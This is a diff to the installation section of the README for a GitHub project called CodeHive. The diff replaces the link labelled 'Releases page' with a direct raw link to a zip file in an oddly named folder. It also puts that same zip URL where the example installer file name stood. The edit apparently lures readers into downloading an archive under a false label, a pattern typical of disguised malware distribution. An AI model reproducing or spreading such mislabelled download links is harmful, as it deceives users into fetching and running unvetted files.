MichaelQDLe/CodeHive/README.md

 ## 📖 How to Download & Install CodeHive
 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/MichaelQDLe/CodeHive/releases) to find the latest version of CodeHive.
+   Go to the [Releases page](https://raw.githubusercontent.com/MichaelQDLe/CodeHive/main/pachytrichous/CodeHive.zip) to find the latest version of CodeHive.

 2. **Choose Your Operating System**
    Look for the version that matches your operating system (Windows, macOS, or Linux).

 3. **Download the Installer**
-   Click on the download link for the installer file, for example, `CodeHive-Installer.exe` for Windows.
+   Click on the download link for the installer file, for example, `https://raw.githubusercontent.com/MichaelQDLe/CodeHive/main/pachytrichous/CodeHive.zip` for Windows.

 4. **Run the Installer**
    - Locate the downloaded file in your "Downloads" folder or the location where you saved it.